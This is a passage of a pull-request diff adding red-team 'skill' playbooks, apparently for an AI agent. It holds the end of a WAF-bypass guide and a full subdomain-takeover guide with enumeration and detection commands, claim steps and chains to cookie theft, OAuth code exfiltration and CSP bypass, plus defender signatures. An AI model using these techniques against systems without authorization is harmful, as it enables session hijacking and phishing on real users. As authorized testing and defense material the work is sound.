+| All sec-2/sec-3 attempts blocked, no origin | Pivot — try a different endpoint, subdomain (often un-onboarded), or chain through SSRF/open-redirect from another target asset |
+| Rate-limit / anomaly score throttling | Back off, lower QPS, rotate fingerprint, prefer authenticated session |
+| Program forbids WAF bypass research | Stop; report WAF presence + suspected gap to the program without exploitation |
+
+## Cross-references
+
+- WAF fingerprint recon: `skills/standard/recon/web-recon/waf-detection/SKILL.md`
+- HTTP smuggling (paired parser-discrepancy bypass): `skills/standard/exploit/web/smuggling/SKILL.md`
+- HTTP Parameter Pollution: `skills/standard/exploit/web/hpp/SKILL.md`
+- Verb tampering (rule sets keyed on GET/POST only): `skills/standard/exploit/web/verb-tampering/SKILL.md`
+- SQLi tamper / blind: `skills/standard/exploit/web/sqli/SKILL.md`
+- Subdomain takeover (origin pivot via trusted subdomain): `skills/standard/recon/web-recon/subdomain-takeover/SKILL.md`

--- a/packages/decepticon/decepticon/skills/standard/recon/web-recon/subdomain-takeover/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/recon/web-recon/subdomain-takeover/SKILL.md
@@ -1,0 +1,175 @@
+---
+name: web-subdomain-takeover
+description: "Subdomain takeover via dangling DNS/CNAME — GitHub Pages, Heroku, Azure, Fastly, Shopify, Netlify, Surge, Tumblr, Beanstalk, Zendesk, etc."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reconnaissance
+  when_to_use: "subdomain takeover, dangling CNAME, dangling DNS, NXDOMAIN provider, can-i-take-over-xyz, subjack, subzy, nuclei takeover, orphaned subdomain"
+  tags: subdomain-takeover, dangling-dns, cname, recon, bug-bounty
+  mitre_attack: T1583.001
+---
+
+# Subdomain Takeover (Dangling DNS / CNAME)
+
+A subdomain CNAMEs to a SaaS provider (GitHub Pages, Heroku, S3, etc.) but the underlying tenant has been deleted, expired, or never claimed. Whoever registers the orphaned tenant name controls a trusted `*.<TARGET>` origin. Severity is almost always **High → Critical** because the attacker inherits the parent domain's cookie scope, CORS allowlist, OAuth `redirect_uri` whitelist, CSP `*.<TARGET>` allowance, and reputation.
+
+## 1. Asset surface — enumerate every subdomain
+
+```bash
+# Passive (no traffic to target)
+subfinder -d <TARGET> -all -silent -o subs.txt
+amass enum -passive -d <TARGET> -o subs.amass.txt
+assetfinder --subs-only <TARGET> >> subs.txt
+findomain -t <TARGET> -q >> subs.txt
+curl -s "https://crt.sh/?q=%25.<TARGET>&output=json" | jq -r '.[].name_value' | tr '\n' '\n' | sort -u >> subs.txt
+sort -u subs.txt -o subs.txt
+
+# Active resolution + CNAME extraction
+dnsx -l subs.txt -cname -resp -silent -o subs.cname.txt
+# subs.cname.txt format:  app.<TARGET>  [cname.provider.net]
+```
+
+## 2. CNAME → provider fingerprints
+
+Resolve each subdomain, capture the CNAME, and match against the dangling-provider table below.
+
+```bash
+while read sub; do
+  cname=$(dig +short CNAME "$sub" | head -n1)
+  [ -z "$cname" ] && continue
+  echo "$sub -> $cname"
+done < subs.txt | tee cname.map
+```
+
+| Provider | CNAME pattern | Vulnerable fingerprint in HTTP body |
+|---|---|---|
+| GitHub Pages | `*.github.io` | `There isn't a GitHub Pages site here.` |
+| Heroku | `*.herokuapp.com`, `*.herokussl.com` | `No such app` / `herokucdn.com/error-pages/no-such-app.html` |
+| AWS S3 | `*.s3*.amazonaws.com` | `NoSuchBucket` |
+| AWS Elastic Beanstalk | `*.elasticbeanstalk.com` | NXDOMAIN on CNAME target |
+| Azure CloudApp | `*.cloudapp.net`, `*.cloudapp.azure.com` | NXDOMAIN |
+| Azure Traffic Manager | `*.trafficmanager.net` | NXDOMAIN |
+| Azure Edge / Front Door | `*.azureedge.net`, `*.azurefd.net` | NXDOMAIN |
+| Azure Websites | `*.azurewebsites.net` | `404 Web Site not found` |
+| Fastly | `*.fastly.net` | `Fastly error: unknown domain` |
+| Shopify | `shops.myshopify.com` | `Sorry, this shop is currently unavailable.` |
+| Netlify | `*.netlify.app`, `*.netlify.com` | `Not Found - Request ID` (and the site is unclaimed) |
+| Surge.sh | `*.surge.sh` | `project not found` |
+| Tumblr | `domains.tumblr.com` | `Whatever you were looking for doesn't currently exist at this address.` |
+| Read the Docs | `readthedocs.io` | `unknown to Read the Docs` |
+| Zendesk | `*.zendesk.com` | `Help Center Closed` |
+| Unbounce | `unbouncepages.com` | `The requested URL was not found on this server.` |
+| Pantheon | `*.pantheonsite.io` | `The gods are wise, but do not know of the site which you seek.` |
+| Help Scout | `*.helpscoutdocs.com` | `No settings were found for this company` |
+| Cargo | `cargocollective.com` | `404 Not Found` + Cargo branding |
+| Tilda | `*.tilda.ws` | `Please renew your subscription` |
+| Webflow | `proxy-ssl.webflow.com` | `The page you are looking for doesn't exist or has been moved.` |
+| Smartling | `*.smartling.com` | `Domain is not configured` |
+| Worksites.net | `*.worksites.net` | `Hello! Sorry, but the website you're looking for doesn't exist.` |
+| Ghost | `*.ghost.io` | `Site unavailable / The thing you were looking for is no longer here, or never was` |
+| LaunchRock | `*.launchrock.com` | `It looks like you may have taken a wrong turn somewhere.` |
+
+Canonical reference (updated by EdOverflow community): `can-i-take-over-xyz`.
+
+## 3. Detection — body fingerprint
+
+```bash
+# Single subdomain
+curl -sk -H 'Host: app.<TARGET>' "https://app.<TARGET>/" -o body.html -w '%{http_code}\n'
+grep -iEf <(printf '%s\n' \
+  "There isn't a GitHub Pages site here" \
+  "no such app" "NoSuchBucket" "Fastly error: unknown domain" \
+  "Sorry, this shop is currently unavailable" "project not found" \
+  "Help Center Closed" "unknown to Read the Docs" \
+  "The gods are wise" "Whatever you were looking for doesn't currently exist" \
+  ) body.html
+```
+
+NXDOMAIN cases (Azure, Beanstalk) are detected at DNS layer — no HTTP body:
+
+```bash
+cname=$(dig +short CNAME "app.<TARGET>" | head -n1)
+[ -n "$cname" ] && dig +short "$cname" | grep -q . || echo "DANGLING: $cname"
+```
+
+## 4. Mass detection
+
+```bash
+# subjack — fingerprints + claim hints
+subjack -w subs.txt -t 50 -timeout 30 -ssl -c ~/go/pkg/mod/github.com/haccer/subjack/fingerprints.json -v -o subjack.out
+
+# subzy — newer, maintained, more providers
+subzy run --targets subs.txt --concurrency 50 --hide_fails --verify_ssl --output subzy.json
+
+# nuclei takeover templates — most up-to-date provider list
+nuclei -l subs.txt -t http/takeovers/ -severity high,critical -o nuclei.takeover.out
+
+# Manual sanity check on hits
+for s in $(awk '/VULNERABLE/{print $NF}' subjack.out); do
+  echo "=== $s ==="; curl -sk -m 10 "https://$s/" | head -c 400; echo
+done
+```
+
+## 5. Claim / PoC
+
+`can-i-take-over-xyz` lists per-provider claim steps. General pattern: register an account on the provider, create the resource with the exact unclaimed name from the CNAME, deploy a marker page, and prove control.
+
+```bash
+# Marker page content — keep it boring, no defacement
+cat > index.html <<EOF
+<!doctype html><html><body>
+<h1>Subdomain takeover PoC — authorized bug-bounty research</h1>
+<p>Subdomain: app.<TARGET></p>
+<p>Reported by: <RESEARCHER></p>
+<p>Date: $(date -u +%FT%TZ)</p>
+<p>Contact: <EMAIL></p>
+</body></html>
+EOF
+# Deploy via the provider's normal flow (git push, heroku create, etc.)
+# Then prove:
+curl -sk "https://app.<TARGET>/" | grep -i 'authorized bug-bounty research'
+```
+
+OPSEC: never collect cookies, never serve JavaScript, never accept POSTs. Marker file + screenshot + DNS chain in the report is sufficient.
+
+## 6. Chains — why this is rarely "informational"
+
+| Chain | How takeover unlocks it |
+|---|---|
+| Cookie theft | Cookies scoped to `.<TARGET>` are sent to your subdomain → session hijack on the parent app. |
+| OAuth redirect_uri | Many IdPs allow any `*.<TARGET>` as `redirect_uri`. Takeover → host the callback → exfil auth `code`. |
+| CSP bypass | If parent app uses `script-src *.<TARGET>` or `connect-src *.<TARGET>`, you host attacker JS that the parent CSP trusts. |
+| postMessage / CORS | `Access-Control-Allow-Origin` reflecting `*.<TARGET>` now trusts attacker JSON. |
+| SAML / SSO | ACS URL allowlists by domain → forge assertions delivered to attacker subdomain. |
+| Service Worker | A SW served from `app.<TARGET>` can intercept fetches inside its scope on that origin — full client-side compromise of any future user landing there. |
+| Phishing / malware delivery | Trusted parent reputation + valid TLS → email filters and users trust the link. |
+| Mixed-content / referrer leakage | Internal tools that whitelist `*.<TARGET>` as image / iframe source leak referrers and IDs to attacker. |
+
+## 7. Detection signatures (for defenders)
+
+| Signal | Source |
+|---|---|
+| CNAME RDATA pointing to provider where NXDOMAIN on the target | DNS audit |
+| Provider error body served from `*.<TARGET>` | HTTP probe |
+| `subjack`/`subzy`/`nuclei` "VULNERABLE" line | Mass scan |
+| Provider tenant deleted but DNS not removed in IaC drift | Terraform / Route53 audit |
+| Recently expired SaaS subscription + still-resolving CNAME | Procurement cross-check |
+
+Remediation: remove the dangling DNS record OR re-claim the resource. Treat CNAMEs to external providers as production assets in CI/CD.
+
+## 8. Decision gate
+
+| Observation | Action |
+|---|---|
+| CNAME → provider on the table AND fingerprint body matches | Proceed to claim PoC → high/critical report |
+| CNAME → provider AND NXDOMAIN at resolver | Same — claim PoC required, often even higher |
+| CNAME → provider but body shows a live tenant page | Out of scope, move on |
+| No CNAME, but A record to provider IP range with no app | Often false positive — verify provider docs before claiming |
+| Subdomain in scope but parent program forbids subdomain takeover testing | Stop — report dangling DNS without claiming |
+
+## Cross-references
+
+- OAuth chain: `skills/standard/exploit/web/oauth/SKILL.md`
+- Open redirect / cookie scoping: `skills/standard/exploit/web/open-redirect/SKILL.md`
+- WAF / origin discovery (sister recon): `skills/standard/recon/web-recon/waf-detection/SKILL.md`
+- Upstream: https://github.com/EdOverflow/can-i-take-over-xyz


### PR DESCRIPTION
Adds four MITRE-mapped web bug-bounty playbooks under `decepticon` standard skills, matching the existing exploit/web format (YAML frontmatter, copy-paste curl PoCs with `<TARGET>`, severity framing, detection-signatures table, decision gate, cross-references).

## New leaf skills

- `standard/recon/web-recon/subdomain-takeover/SKILL.md` — generic dangling CNAME / DNS takeover beyond S3: 20+ provider fingerprints (GitHub Pages, Heroku, Azure cloudapp/trafficmanager/edge, Fastly, Shopify, Netlify, Surge, Tumblr, Elastic Beanstalk, Read the Docs, Zendesk, Unbounce, Pantheon, Help Scout, Cargo, Tilda, Webflow, Smartling, Ghost, LaunchRock), `can-i-take-over-xyz` methodology, subjack/subzy/nuclei mass detection, claim PoC discipline, chains to cookie scoping / OAuth `redirect_uri` / CSP / SAML / Service-Worker takeover.
- `standard/exploit/web/hpp/SKILL.md` — HTTP Parameter Pollution: parser-precedence table across PHP / ASP.NET / Java / Node / Python / Ruby / Go / nginx / Apache / API Gateway / Cloudflare / AWS WAF / ModSecurity; detection, WAF bypass via duplicate params, server- and client-side HPP, auth/ACL bypass, injection delivery.
- `standard/exploit/web/verb-tampering/SKILL.md` — HTTP verb/method tampering: HEAD/OPTIONS/arbitrary-verb auth bypass, `X-HTTP-Method-Override` and `_method`, Tomcat/JSP/Spring/Express routing flaws, TRACE/XST, WebDAV PUT/PROPFIND RCE; chains to BFLA / IDOR / mass-assignment.
- `standard/exploit/web/waf-bypass/SKILL.md` — dedicated WAF evasion: payload obfuscation, HTTP-level evasion (chunked, content-type/charset confusion, multipart smuggling, HTTP/2 quirks), origin-IP discovery via crt.sh / Shodan / Censys / passive DNS / SSRF / MX, rate/anomaly evasion with JA3 rotation; per-WAF notes for Cloudflare / Akamai / AWS WAF (body inspection cap bypass) / ModSecurity-CRS / Imperva / Sucuri. OPSEC-aware.

## Validation

- `python yaml.safe_load` on all four frontmatters: ok; files end with single newline, no trailing whitespace.
- `uv run ruff check .` — clean.
- `uv run pytest -p no:xdist -q packages/decepticon/tests/unit/tools/test_skills_loader.py packages/decepticon/tests/unit/tools/test_skills_registry.py packages/decepticon/tests/unit/tools/test_skills.py packages/decepticon/tests/unit/middleware/test_skills.py packages/decepticon/tests/unit/backends/test_skills_path.py` — **111 passed**.

## Constraints honored

- Skill files only — no code, deps, or `pyproject` changes.
- Conventional-Commit title; no AI co-author trailer; existing git identity preserved.
- Authorized defensive-security red-team playbooks; severity framing and OPSEC notes throughout.